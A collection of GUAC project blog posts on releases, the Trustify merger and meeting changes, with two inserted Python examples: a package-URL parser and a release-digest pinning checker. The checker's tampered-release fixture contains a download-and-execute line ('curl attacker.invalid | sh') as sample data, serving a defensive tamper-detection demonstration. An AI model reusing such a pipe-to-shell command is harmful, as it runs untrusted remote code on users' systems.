GUAC Blog

GUAC Update: October 2025

Welcome to the GUAC Update, a monthly review of what has happened in the GUAC community and what’s coming up. If you have feedback, please let us know. To include something in next month’s update, leave a comment in the issue.

Releases

  • Trustify 0.4.1 adds a REST API endpoint for recommended PURLs, along with many other features.

Community

The GUAC Maintainers Meeting is now every other week instead of weekly. You can always find the most up-to-date time and location of meetings on the OpenSSF Calendar. Of course, the GUAC public Slack channel is always open.

New contributors

Coming up

Several members of the GUAC community will be at Open Source SecurityCon and KubeCon NA in Atlanta, GA, US the week of 10 November. Be sure to join us in the Maintainer Meetings or on Slack to participate in the conversation.

Tags: guac-update | community | events


Maintainer Meeting switching to bi-weekly

The GUAC Maintainer Meeting is switching from a weekly schedule to every other week (bi-weekly). The next meeting will be Monday 17 November. We’re making this switch to better respect people’s time, as the meeting agendas have become smaller after the GUAC 1.0 release and the Trustify merger.

You can always find the most up-to-date time and location of meetings on the OpenSSF Calendar. Of course, the GUAC public Slack channel is always open.

Tags: community | meetings


Trustify v0.4.1 released

Trustify v0.4.1 is now available. This release provides a new recommendations API endpoint for PURLs to suggest updated package versions and related vulnerability remediations.

The new release also includes the features in the v0.4.0 release from earlier this month:

  • Enhanced SBOM Correlation: Improved correlation for SBOMs, especially those without CPEs
  • Advanced License Filtering: New filtering capabilities for SBOMs, PURLs, and a dedicated license list endpoint
  • Performance and Memory Improvements: Analysis memory consumption has been reduced by approximately 15%, and caching has been improved
  • Expanded Vulnerability Scores: Now includes scores from CVSSv4 and CVSSv2
  • Storage and GC Enhancements: Added a garbage collection endpoint and improved the deletion process for SBOMs and advisories

Join us

If you’re interested in joining our community or contributing, we’d love to have you.

Tags: releases | trustify


GUAC Update: September 2025

Welcome to the GUAC Update, a monthly review of what has happened in the GUAC community and what’s coming up. If you have feedback, please let us know. To include something in next month’s update, leave a comment in the issue.

With the addition of Trustify, the community has grown quite a bit.

Releases

Community

New contributors

Coming up

Be sure to join us in the weekly Maintainer Meetings or on Slack to participate in the conversation.

Tags: guac-update | community | events


GUAC v1.0.1 released

GUAC v1.0.1 is now available. This patch release largely updates dependencies. It also fixes a bug where an ingestor process could hang when encountering a read error from the NATS pub-sub service. This bug fix was contributed by Shreyas Panyda.

Join us

If you’re interested in joining our community or contributing, we’d love to have you.

Tags: releases | guac


GUAC Update: August 2025

Welcome to the GUAC Update, a monthly review of what has happened in the GUAC community and what’s coming up. If you have feedback, please let us know. To include something in next month’s update, leave a comment in the issue.

Releases

guac-visualizer v0.6.0 was released, which includes GraphQL (GQL) updates for recent GUAC releases and various bug fixes.

Community

The big news is that Trustify has joined the GUAC community. Check out the newly-reconfigured website and docs!

New contributors

Coming up

Be sure to join us in the weekly Maintainer Meetings or on Slack to participate in the conversation.

Tags: guac-update | community | events


Trustify joins GUAC

The superpower of open source is multiple people working together on a common goal. That works for projects, too. GUAC and Trustify are two projects bringing visibility to the software supply chain. Today, they’re combining under the GUAC umbrella. With Red Hat’s contribution of Trustify to the GUAC project, the two combine to create a unified effort to address the challenges of consuming, processing, and utilizing supply chain security metadata at scale.

Why join?

The Graph for Understanding Artifact Composition (GUAC) project was created to bring understanding to software supply chains. GUAC ingests software bills of materials (SBOMs) and enriches them with additional data to create a queryable graph of the software supply chain. Trustify also ingests and manages SBOMs, with a focus on security and compliance. With so much overlap, it makes sense to combine our efforts.

The grand vision for this evolved community is to become the central hub within OpenSSF for initiatives focused on building and using supply chain knowledge graphs. This includes: defining & promoting common standards, data models, & ontologies; developing shared infrastructure & libraries; improving the overall tooling ecosystem; fostering collaboration & knowledge sharing; and providing a clear & welcoming community for contributors.

What’s next?

Right now, we’re working on the basic logistics: migrating repositories, updating websites, merging documentation. We have created a new GUAC Steering Committee that oversees two core projects: Graph for Understanding Artifact Composition (GUAC) and Trustify, and subprojects like sw-id-core and GUAC Visualizer. These projects have their own maintainers, but we expect to see a lot of cross-collaboration as everyone gets settled in.

If you’d like to learn more, join Ben Cotton and Dejan Bosanac at OpenSSF Community Day Europe for their talk on Thursday 28 August. If you can’t make it to Amsterdam, the community page has all of the ways you can engage with our community.

Tags: guac | trustify


guac-visualizer 0.6.0 released

Version 0.6.0 of the GUAC Visualizer is now available. The GUAC Visualizer is an experimental utility that can be used to interact with GUAC services. It acts as a way to visualize the software supply chain graph and explore the supply chain.

Version 0.6.0 includes a fix for handling packages with an empty namespace. It also improves reliability by using Next.js’s native proxy functionality. Of course, it also comes with dependency updates.
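The empty-namespace case is a recurring source of bugs in tools that handle package URLs (pURLs): many package types (npm without a scope, pypi, cargo) have no namespace, and GUAC’s GraphQL data model represents that as an empty string rather than a missing field. The following is an added example, not code from guac-visualizer or GUAC, showing a minimal pURL parser and serializer that treats a missing namespace, an empty namespace string and an empty path segment (`pkg:npm//lodash`) identically, so a package without a namespace round-trips without growing a stray `//`. The sample pURLs are constructed for the example; the `Purl`, `parse_purl` and `to_purl` names are this example’s own.

```python
"""Minimal package-URL (pURL) parser and serializer.

Added example (not guac-visualizer or GUAC code). It follows the pURL
specification's component order (subpath, then qualifiers, then version,
then type/namespace/name) and treats "no namespace" consistently whether it
arrives as None, as "" (GUAC's GraphQL convention) or as an empty segment.
"""
from __future__ import annotations

from dataclasses import dataclass, field
from typing import Dict, Optional
from urllib.parse import quote, unquote


@dataclass(frozen=True)
class Purl:
    type: str
    namespace: Optional[str]          # None or "" both mean "no namespace"
    name: str
    version: Optional[str] = None
    qualifiers: Dict[str, str] = field(default_factory=dict)
    subpath: Optional[str] = None


def parse_purl(purl: str) -> Purl:
    """Split a pURL string into its components, percent-decoding each."""
    scheme, sep, rest = purl.partition(":")
    if sep == "" or scheme.lower() != "pkg":
        raise ValueError(f"not a pURL: {purl!r}")
    rest = rest.lstrip("/")                        # 'pkg://npm/x' is tolerated
    rest, _, subpath = rest.partition("#")         # subpath is split off first
    rest, _, qualifier_str = rest.partition("?")   # then the qualifiers
    rest, at, version = rest.rpartition("@")       # then the version (rightmost '@')
    if at == "":                                   # no '@': rpartition put it all in 'version'
        rest, version = version, ""
    segments = rest.split("/")
    if len(segments) < 2 or not segments[0] or not segments[-1]:
        raise ValueError(f"pURL needs a type and a name: {purl!r}")
    ptype = segments[0].lower()
    name = unquote(segments[-1])
    # Namespace is everything between type and name. Dropping empty segments
    # makes 'pkg:npm//lodash' and 'pkg:npm/lodash' both yield no namespace.
    ns_parts = [unquote(s) for s in segments[1:-1] if s]
    namespace = "/".join(ns_parts) if ns_parts else None
    qualifiers: Dict[str, str] = {}
    for pair in filter(None, qualifier_str.split("&")):
        key, _, value = pair.partition("=")
        if value:                                  # empty-valued qualifiers are discarded
            qualifiers[key.lower()] = unquote(value)
    return Purl(ptype, namespace, name, unquote(version) or None,
                qualifiers, unquote(subpath).strip("/") or None)


def to_purl(p: Purl) -> str:
    """Serialize back to a pURL. A None or "" namespace emits no segment at all."""
    out = ["pkg:", p.type, "/"]
    if p.namespace:                                # skip both None and ""
        out.append("/".join(quote(s, safe="") for s in p.namespace.split("/")) + "/")
    out.append(quote(p.name, safe=""))
    if p.version:
        out.append("@" + quote(p.version, safe=""))
    if p.qualifiers:
        out.append("?" + "&".join(f"{k}={quote(v, safe='')}"
                                  for k, v in sorted(p.qualifiers.items())))
    if p.subpath:
        out.append("#" + "/".join(quote(s, safe="") for s in p.subpath.split("/")))
    return "".join(out)


if __name__ == "__main__":
    # Constructed sample pURLs, including the empty-namespace forms.
    for s in ("pkg:npm/lodash@4.17.21", "pkg:npm//lodash@4.17.21",
              "pkg:npm/%40babel/core@7.0.0", "pkg:golang/github.com/guacsec/guac@v1.0.1"):
        p = parse_purl(s)
        print(f"{s:45} namespace={p.namespace!r:22} -> {to_purl(p)}")
```

The point of the example is the two equivalences a UI or ingestor has to preserve: `parse_purl("pkg:npm//lodash@4.17.21")` and `Purl("npm", "", "lodash", "4.17.21")` both serialize to `pkg:npm/lodash@4.17.21`, while a genuinely namespaced package such as `@babel/core` keeps its `%40babel/` segment.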

This release includes first-time contributions from:

With this release, we’re also testing GitHub’s Immutable Releases feature (currently in private preview). When used, this feature prevents changing any artifacts after a release is published. Post-release alteration of release contents is a common supply chain attack, so we’re glad to be trying out a feature that will close off that threat. You’ll see the tag “🔒 Immutable” next to the timestamp in the release.
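Immutable releases close off post-publication tampering on the publisher’s side; the matching check on the consumer’s side is to pin each asset’s digest at the first trusted download and refuse any later copy that differs. The following is an added example, not GUAC, guac-visualizer or GitHub code, showing that pin-and-verify check over constructed asset bytes (no real release contents are used). The `pin_release`, `verify_release` and `release_is_trusted` names, the asset names and the sample bytes are this example’s own.

```python
"""Pin release-asset digests and detect a post-publication swap.

Added example (not GUAC or GitHub code). Immutable Releases prevent the
publisher from changing assets after publication; this is the consumer-side
check that would catch such a change (or a silently added asset) anyway.
Asset names and bytes below are constructed for the example.
"""
import hashlib
import hmac
from typing import Dict

# Constructed "first trusted download": the assets as originally published.
PUBLISHED_ASSETS: Dict[str, bytes] = {
    "guac-visualizer-v0.6.0.tar.gz": b"constructed tarball bytes, version 0.6.0",
    "checksums.txt": b"constructed checksum listing",
}

# Constructed "later download": the tarball has been replaced and a new
# asset has appeared that was never part of the pinned release.
SWAPPED_ASSETS: Dict[str, bytes] = {
    "guac-visualizer-v0.6.0.tar.gz": b"constructed tarball bytes, version 0.6.0 + backdoor",
    "checksums.txt": b"constructed checksum listing",
    "install.sh": b"curl attacker.invalid | sh",
}


def pin_release(assets: Dict[str, bytes]) -> Dict[str, str]:
    """Record the SHA-256 of every asset at the time of the trusted first fetch."""
    return {name: hashlib.sha256(data).hexdigest() for name, data in assets.items()}


def verify_release(pins: Dict[str, str], assets: Dict[str, bytes]) -> Dict[str, str]:
    """Compare freshly fetched assets against the pins.

    Verdict per asset name:
      'ok'        digest matches the pin
      'tampered'  asset present but digest differs
      'missing'   pinned asset no longer present
      'unpinned'  asset present that was not part of the pinned release
    """
    verdicts: Dict[str, str] = {}
    for name, pinned in pins.items():
        if name not in assets:
            verdicts[name] = "missing"
            continue
        actual = hashlib.sha256(assets[name]).hexdigest()
        # compare_digest avoids leaking where the digests first differ.
        verdicts[name] = "ok" if hmac.compare_digest(actual, pinned) else "tampered"
    for name in assets:
        if name not in pins:
            verdicts[name] = "unpinned"
    return verdicts


def release_is_trusted(verdicts: Dict[str, str]) -> bool:
    """Only an all-'ok' verdict set is acceptable; an extra asset is also a failure."""
    return bool(verdicts) and all(v == "ok" for v in verdicts.values())


if __name__ == "__main__":
    pins = pin_release(PUBLISHED_ASSETS)
    print("same assets  :", verify_release(pins, PUBLISHED_ASSETS))
    print("swapped assets:", verify_release(pins, SWAPPED_ASSETS))
```

Rejecting an `unpinned` asset is deliberate: an attacker who cannot modify an existing file may still add a new one (an installer script, a second checksum file) and point documentation at it, so the pin set has to be treated as closed, not as a minimum.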

You may notice that the previous release was v0.14.10. The v0.5.0 tag had been applied locally and was accidentally pushed alongside v0.6.0.

Tags: releases | guac-visualizer


Ending GUAC community meetings

With the recent release of GUAC 1.0, the GUAC Maintainers have decided this is a good time to end the monthly community meetings.

When the project started, the monthly community meetings were the main venue for people interested in GUAC to have high-bandwidth discussion. Users and contributors shared use cases, discussed design ideas, and sought help with using pre-1.0 GUAC.

Since the weekly maintainer meetings became public last year, we’ve seen a lot of community members join them. This seems to have come at the expense of topics and attendance for the community meeting. It makes sense that if people have something to discuss, they’d rather do it at the next weekly meeting than wait weeks for the next community meeting. To us, that’s a success.

The weekly maintainer meetings are staying put. If you have something you want to discuss, you’re always welcome to join on Mondays or ask in the #guac channel on the OpenSSF Slack. See the community page for details. Notes from past community meetings will remain available on GitHub and the recordings are on the GUAC YouTube channel.

Tags: community | meetings


GUAC Update: June 2025

Welcome to the GUAC Update, a monthly review of what has happened in the GUAC community and what’s coming up. If you have feedback, please let us know. To include something in next month’s update, leave a comment in the issue.

The big news, of course, is that we released GUAC 1.0! This represents contributions from over 400 people representing more than 90 organizations including Kusari, Google, Purdue University, Microsoft, and Red Hat. Download GUAC v1.0 to get started!

Community

New contributors

Events

Several members of the GUAC community presented at Open Source Summit North America in Denver:

Coming up

Some members of the GUAC community will be presenting at Open Source Summit and OpenSSF Community Day Europe in Amsterdam at the end of August. A detailed listing will be in next month’s GUAC update.

In addition, we’re working to finalize the legal necessities for welcoming the Trustify project under the GUAC umbrella. Stay tuned for details.

In the meantime, be sure to join us in the weekly Maintainer Meetings or on Slack to participate in the conversation.

Tags: guac-update | community | events